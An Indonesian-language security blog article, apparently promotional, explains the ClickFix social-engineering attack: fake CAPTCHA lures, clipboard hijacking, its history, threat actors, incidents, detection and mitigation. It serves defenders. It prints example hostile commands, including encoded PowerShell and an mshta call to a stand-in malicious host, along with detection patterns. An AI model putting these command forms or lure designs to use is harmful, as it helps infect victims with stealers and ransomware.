Apa Itu ClickFix?
ClickFix adalah teknik social engineering yang memanipulasi korban agar secara sukarela menjalankan perintah berbahaya di perangkat mereka sendiri. Tidak ada exploit, tidak ada attachment mencurigakan — yang ada hanyalah sebuah halaman web dengan instruksi yang tampak resmi, dan korban yang menekan tombol Enter.
Ini bukan kerentanan teknis. Ini adalah serangan terhadap psikologi manusia — jauh lebih sulit diblokir oleh teknologi keamanan konvensional karena pengguna sendiri yang menjadi 'last mile executor' serangan.
Serangan #2 Terbesar di Dunia (H1 2025)
ClickFix menyumbang ~8% dari seluruh serangan yang diblokir secara global, menjadikannya vektor serangan terbesar kedua setelah phishing biasa. Pertumbuhan H1 2025 vs H2 2024: +517% (ESET Threat Report H1 2025).
Cara Kerja ClickFix — Step-by-Step
ClickFix berhasil karena tampilannya meyakinkan dan instruksinya terasa wajar. Berikut anatomi lengkap serangan ini dari awal hingga infeksi.
Initial Lure — Menggiring Korban ke Halaman Berbahaya
Korban diarahkan ke halaman web berbahaya melalui berbagai jalur:
- Email phishing berisi link yang tampak sah
- Malvertising — iklan berbahaya di situs streaming atau download ilegal
- SEO poisoning — situs berbahaya muncul tinggi di hasil pencarian
- Situs WordPress yang telah dikompromisi
- GitHub issue notifications palsu
- Forum atau media sosial yang mempromosikan software crack
Fake Verification Page — Halaman Verifikasi Palsu
Halaman menampilkan lure yang tampak sangat meyakinkan, antara lain:
- Fake reCAPTCHA/CAPTCHA: 'Klik I'm not a robot untuk melanjutkan'
- Fake Cloudflare Turnstile: 'Bot protection verification required'
- Browser error: 'Browser Anda tidak dapat menampilkan konten ini'
- Fake Google Meet/Teams/Zoom: 'Microphone Anda bermasalah, jalankan perbaikan'
- Fake Windows BSOD: tampilan blue screen penuh dengan instruksi 'repair'
Clipboard Hijacking — Injeksi Clipboard Tersembunyi
Saat korban mengklik tombol ('I'm not a robot', 'Fix It', 'Verify'), JavaScript yang tertanam di halaman secara otomatis menyalin perintah berbahaya ke clipboard korban — tanpa sepengetahuan korban. Kode berbahaya diletakkan di awal string sementara 'komentar' non-eksekutif ditempatkan di akhir untuk menyamarkan isi clipboard.
User Execution via Win+R — Korban Menjalankan Perintahnya Sendiri
Pop-up muncul dengan instruksi yang tampak resmi: 'Tekan Windows+R, lalu tekan Ctrl+V, lalu tekan Enter untuk menyelesaikan verifikasi.' Korban mengikuti instruksi ini tanpa menyadari bahwa mereka baru saja menjalankan perintah berbahaya di terminal Windows mereka. Di macOS, korban diarahkan membuka Terminal dan menempelkan perintah bash/curl.
Payload Download — Mengunduh Malware
Perintah yang dijalankan biasanya berbentuk PowerShell ter-encode atau MSHTA yang mengunduh payload dari server penyerang. Contoh nyata dari analisis Group-IB:
- powershell.exe -eC [BASE64_ENCODED_COMMAND]
- powershell.exe -WindowStyle Hidden -EncodedCommand [...]
- mshta.exe 'https://domain-berbahaya.com/payload'
Multi-Stage Delivery — Infeksi Berlapis Tanpa File
Loader mengunduh stage kedua dari domain yang berputar. Stage dua menambahkan persistensi (registry, scheduled task), mencoba menonaktifkan proteksi, dan menginjeksi payload akhir ke dalam proses Windows yang legitimate (seperti explorer.exe). Payload akhir — biasanya infostealer atau RAT — berjalan murni di memori tanpa menulis file ke disk, sehingga lolos dari banyak antivirus tradisional.
Sejarah & Evolusi ClickFix
ClickFix bukan teknik yang tiba-tiba muncul. Ia berevolusi secara bertahap dari trik sederhana menjadi alat pilihan kelompok espionage tingkat negara.
| Periode | Peristiwa Penting |
|---|---|
| Oktober 2023 | Deteksi pertama — varian sederhana menyamar sebagai Cloudflare anti-bot. Belum bernama 'ClickFix' |
| Maret 2024 | Proofpoint mendokumentasikan secara luas. TA571 dan ClearFake cluster menjadi pengguna pertama. Nama 'ClickFix' mulai digunakan |
| Mei 2024 | ClearFake mengintegrasikan ClickFix + EtherHiding (payload tersembunyi di smart contract BNB Chain). Payload: Emmenhtal Loader dan Lumma Stealer |
| Agustus 2024 | Adopsi massal. SmartApeSG mendistribusikan Remcos RAT, NetSupport RAT, StealC, dan Sectop RAT via ClickFix |
| Oktober 2024 | APT28 (Rusia) mulai menggunakan ClickFix — pertama kali teknik kriminal ini diadopsi aktor negara |
| November 2024 | MuddyWater (Iran) menyerang 39+ organisasi Timur Tengah dengan ClickFix |
| Desember 2024 | UNK_RemoteRogue (Rusia) menyerang produsen senjata pertahanan |
| Jan–Feb 2025 | Kimsuky (Korea Utara) mulai menggunakan ClickFix menarget think tank kebijakan DPRK |
| H1 2025 | ESET melaporkan lonjakan +517%. ClickFix menjadi vektor serangan terbesar kedua di dunia |
| Juni 2025 | Peneliti mr.d0x memperkenalkan FileFix — evolusi ClickFix menggunakan Windows File Explorer address bar. 14 hari kemudian sudah digunakan di serangan nyata |
| Q1 2026 | Tujuh varian aktif teridentifikasi: ClickFix original, TerminalFix, DownloadFix, FileFix, ClickFake Interview, CrashFix, dan varian macOS Matryoshka |
Siapa yang Menggunakan ClickFix?
Yang membuat ClickFix sangat mengkhawatirkan bukan hanya prevalensinya, tetapi siapa yang menggunakannya. Dalam jendela 90 hari antara Oktober 2024 – Januari 2025, lima kelompok nation-state dari empat negara berbeda mengadopsi teknik ini — rekor adopsi teknik kriminal oleh aktor negara yang belum pernah terjadi sebelumnya.
Aktor Kriminal
- TA571 — Initial Access Broker, pengguna pertama ClickFix
- ClearFake — Fake browser update + EtherHiding
- SmartApeSG (ZPHP) — Multi-payload delivery chain
- Storm-1865 — Kampanye Booking.com global
- Storm-1607 — Puluhan ribu email ke AS & Kanada
- Interlock Group — Ransomware ke sektor healthcare
Nation-State / APT
- APT28 (Rusia) — Espionage via fake Google Spreadsheet
- UNK_RemoteRogue (Rusia) — Menyerang produsen senjata
- MuddyWater (Iran) — 39+ org di Timur Tengah
- Kimsuky (Korea Utara) — Think tank kebijakan DPRK
- APT36 / Transparent Tribe (Pakistan) — Dikonfirmasi Mei 2025
Malware yang Dikirimkan via ClickFix
ClickFix bersifat agnostik terhadap payload — ia hanyalah pintu masuk. Begitu korban menjalankan perintah, hampir semua jenis malware dapat dikirimkan. Inilah yang membuatnya begitu berbahaya: satu teknik social engineering yang sama bisa berujung pada pencurian data, ransomware, atau operasi espionage.
Lumma Stealer
InfostealerPayload paling umum — bertanggung jawab atas 51% infeksi ClickFix. Mencuri credentials browser, crypto wallet, session cookie, dan 2FA codes.
NetSupport RAT
RATRemote Access Trojan menggunakan tool legitimate NetSupport Manager untuk menyembunyikan aktivitasnya dari deteksi keamanan.
Interlock Ransomware
RansomwareKelompok Interlock menggunakan ClickFix sebagai initial access sebelum deploy ransomware di sektor healthcare — DaVita dan Kettering Health menjadi korban nyata.
QuasarRAT
EspionageOpen-source RAT yang digunakan Kimsuky (Korea Utara) untuk operasi espionage terhadap think tank kebijakan DPRK di AS dan Jepang.
DarkGate & Latrodectus
LoaderLoader modular multi-fungsi yang dapat mengunduh payload tambahan, membangun persistensi, dan beroperasi sebagai backdoor jangka panjang.
AMOS (Atomic macOS Stealer)
macOSVarian khusus macOS yang mencuri credentials browser, crypto wallet, dan data sensitif lainnya — ClickFix bukan ancaman eksklusif Windows.
Insiden Nyata & Kampanye Terdokumentasi
ClickFix bukan sekadar teknik teoritis. Berikut adalah kampanye dan insiden nyata yang terdokumentasi dengan baik — membuktikan dampak nyata serangan ini di berbagai industri dan geografi.
DaVita Ransomware — Maret 2025
HealthcarePenyedia dialisis ginjal terbesar kedua di AS. Intrusi awal via ClickFix pada 24 Maret 2025, terdeteksi 12 April. Interlock ransomware mengklaim 1,5 TB data curian — 2,7 juta data pasien terekspos.
Kettering Health — Mei 2025
Healthcare14 rumah sakit dan 120+ klinik di Midwest AS. Serangan Interlock ransomware via ClickFix menyebabkan ribuan prosedur medis dibatalkan. Data pasien, rekam medis, laporan bank, dan scan paspor dicuri.
Storm-1865 Booking.com — Des 2024
HospitalityEmail palsu dari 'Booking.com' ke staf hotel tentang 'ulasan negatif tamu'. Target: Asia Selatan, Asia Tenggara, North America, Oceania, Eropa. Payload: XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot.
APT28 Espionage — Oktober 2024
Nation-StateRusia (APT28) meniru Google Spreadsheet dengan fake reCAPTCHA. Saat korban 'memverifikasi', mereka tanpa sadar membuka SSH tunnel ke server Metasploit — digunakan untuk operasi espionage.
MuddyWater / Iran — November 2024
Nation-StateSengaja dilancarkan bertepatan dengan Microsoft Patch Tuesday agar email 'security alert' terlihat meyakinkan. Menyerang 39+ organisasi keuangan dan pemerintah Timur Tengah dengan Level RMM tool untuk espionage.
Kimsuky / Korea Utara — Jan 2025
EspionageMeniru korespondensi diplomatik Jepang untuk menipu peneliti think tank kebijakan DPRK di AS, Jepang, dan Korea Selatan. Korban melihat PDF decoy sementara QuasarRAT diinstall di latar belakang.
Statistik & Prevalensi 2025
Data kuantitatif berikut memberikan gambaran betapa masifnya adopsi ClickFix dalam waktu singkat — dari teknik niche menjadi ancaman global yang dihadapi hampir setiap organisasi.
+517%
Pertumbuhan serangan H1 2025 vs H2 2024
ESET Threat Report
#2
Vektor serangan terbesar di dunia setelah phishing biasa
ESET H1 2025
~8%
Dari seluruh serangan yang diblokir secara global (H1 2025)
ESET
47%
Notifikasi initial access Microsoft Defender Experts melibatkan ClickFix
Microsoft
5 APT
Kelompok nation-state dari 4 negara berbeda dalam 90 hari
Proofpoint
51%
Infeksi ClickFix mengantarkan Lumma Stealer sebagai payload utama
Industry Analysis
Mengapa Pengguna Jatuh Korban?
ClickFix berhasil bukan karena kegagalan teknologi, tetapi karena mengeksploitasi bagaimana otak manusia bekerja. Memahami faktor psikologis ini adalah langkah pertama untuk membangun kesadaran yang efektif.
Verification Fatigue
Bertahun-tahun CAPTCHA dan prompt keamanan telah mengkondisikan pengguna untuk menyelesaikannya secara otomatis tanpa scrutiny. Mereka dianggap 'hambatan biasa', bukan tanda bahaya.
Authority Mimicry
Halaman ClickFix meniru layanan tepercaya secara pixel-perfect: Google reCAPTCHA, Cloudflare, Booking.com, Microsoft Office. Kepercayaan terhadap merek ini ter-transfer ke halaman palsu.
Problem-Solution Framing
ClickFix selalu hadir dengan 'masalah' (browser error, video tidak bisa dimuat) disertai 'solusi' yang terlihat mudah dan logis. Otak manusia secara instinktif ingin menyelesaikan masalah.
Urgency Creation
Countdown timer, counter palsu '127 pengguna telah diverifikasi', dan peringatan 'akun akan diblokir' menciptakan tekanan psikologis yang mengurangi kemampuan berpikir kritis.
Memanfaatkan Security Awareness
Pengguna yang sudah 'melek phishing' waspada terhadap attachment. ClickFix tidak menggunakan attachment — ini adalah halaman web normal dengan instruksi teknis. Pertahanan kognitif konvensional tidak berlaku.
Ilusi Kontrol
Korban merasa 'memiliki kontrol' karena merekalah yang memilih menekan tombol. Padahal mereka sedang dimanipulasi. Ini jauh lebih efektif secara psikologis dari drive-by download.
Cara Mendeteksi Serangan ClickFix
ClickFix dirancang untuk lolos dari deteksi tradisional karena tidak ada file berbahaya yang diunduh di awal — yang ada hanyalah pengguna yang menjalankan perintah. Namun ada beberapa artifact dan sinyal yang dapat dideteksi.
| Metode Deteksi | Yang Dicari | Tool/Platform |
|---|---|---|
| Registry Audit | RunMRU key berisi PowerShell, mshta, certutil, Base64 strings, atau -WindowStyle Hidden | Windows Registry / SIEM |
| Windows Event ID 4688 | powershell.exe atau mshta.exe yang di-spawn oleh explorer.exe (bukan IDE atau terminal) | Windows Event Log / SIEM |
| PowerShell Script Block (Event 4104) | EncodedCommand, DownloadString, Invoke-Expression, atau URL download di dalam skrip | PowerShell Logging / SIEM |
| EDR Behavioral Detection | Process chain: explorer.exe → powershell.exe → mshta.exe / certutil.exe / bitsadmin.exe | EDR / XDR Platform |
| Network Detection | Outbound ke domain baru (<30 hari), PowerShell dengan user-agent tidak biasa, DNS query ke domain tidak dikenal | Firewall / IDS / DNS Filter |
| Threat Intel Integration | IoC dari Recorded Future Risk Lists, VirusTotal, ANY.RUN untuk domain dan hash terkait ClickFix aktif | SIEM / Threat Intel Feed |
Pencegahan & Mitigasi ClickFix
Tidak ada satu kontrol yang cukup untuk menghentikan ClickFix. Diperlukan kombinasi technical hardening, people training, dan detection capability yang bekerja berlapis.
Security Awareness Training
Latih pengguna untuk TIDAK PERNAH menjalankan perintah dari instruksi halaman web. Tunjukkan contoh nyata halaman ClickFix. Sampaikan: 'Tidak ada CAPTCHA yang memerlukan Anda membuka Run dialog atau Terminal.'
Nonaktifkan Windows Run Dialog via GPO
User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu. Ini menghilangkan vektor eksekusi utama ClickFix.
PowerShell Hardening
Terapkan Constrained Language Mode, aktifkan Script Block Logging dan Transcription Logging, set Execution Policy ke AllSigned atau Restricted untuk pengguna non-admin.
Blokir mshta.exe untuk Pengguna Standar
MSHTA adalah LOLBIN (Living Off the Land Binary) favorit ClickFix. Deploy AppLocker atau WDAC untuk mencegah eksekusinya oleh pengguna non-administrator.
Deploy EDR dengan Behavioral Protection
Pastikan EDR mampu mendeteksi process chain mencurigakan dan ter-update dengan signature ClickFix terbaru. Behavioral detection jauh lebih efektif dari signature-based untuk ancaman ini.
DNS Filtering & Web Proxy
Blokir domain berbahaya yang dikenal, domain baru (<30 hari), dan situs yang belum terkategorisasi. Malicious Domain Blocking and Reporting (MDBR) service memberikan perlindungan tambahan.
Email Security dengan URL Sandboxing
Filter email berisi link ke domain baru, sandbox URL sebelum pengguna dapat mengklik, dan terapkan SPF/DKIM/DMARC untuk mencegah domain spoofing.
Application Allowlisting
Buat daftar putih aplikasi yang boleh dieksekusi dan blokir file yang tidak dikenal dari %APPDATA%, %TEMP%, dan direktori lainnya yang sering digunakan oleh ClickFix loader.
Situasi Asia Tenggara & Indonesia
Meskipun tidak ada kampanye ClickFix yang secara eksklusif menarget Indonesia yang terdokumentasi penuh, beberapa kampanye besar telah secara eksplisit menyebut Asia Tenggara sebagai target — dan faktor risiko Indonesia sangat signifikan.
Kampanye Storm-1865 yang meniru Booking.com (Desember 2024 – Maret 2025) secara eksplisit menarget 'South and Southeast Asia' bersama North America, Oceania, dan Eropa. Mengingat besarnya industri perhotelan dan pariwisata Indonesia, kemungkinan dampaknya sangat nyata.
Faktor Risiko Indonesia yang Perlu Diwaspadai
210+ juta pengguna internet, sektor UMKM yang masif dan semakin digital, industri perhotelan besar yang menjadi target Storm-1865, tingkat security awareness yang masih perlu ditingkatkan, dan prevalensi penggunaan layanan global (Google, Microsoft) yang menjadi target ideal ClickFix. Selama Ramadan/Lebaran, phishing — termasuk teknik berbasis ClickFix — meningkat 30% menurut data LKDI.
2×
Serangan siber di Asia Tenggara berlipat ganda pada 2024 vs 2023
Positive Technologies
57.000+
Insiden ransomware di Asia Pasifik dalam H1 2024
Industry Report
Top 6
Indonesia masuk daftar negara paling terdampak ransomware di Asia Tenggara
Regional Analysis
ClickFix tidak memerlukan exploit — hanya manipulasi psikologis. CloudSphere membantu organisasi Anda menguji ketahanan terhadap social engineering attack melalui Security Assessment & VAPT.
Bagikan Artikel
Topik Terkait
Artikel Terkait
Threat Intelligence
Threat Intelligence: Cara Kerja, Jenis, dan Implementasi di Organisasi Modern
30 Juni 2026
Endpoint Security
Implementasi Endpoint Security di Organisasi: Dari Dasar hingga Strategi Berlapis
29 Juni 2026
VAPT
Panduan VAPT & Penetration Testing: Cara Menguji Keamanan Sebelum Penyerang Melakukannya
29 Juni 2026
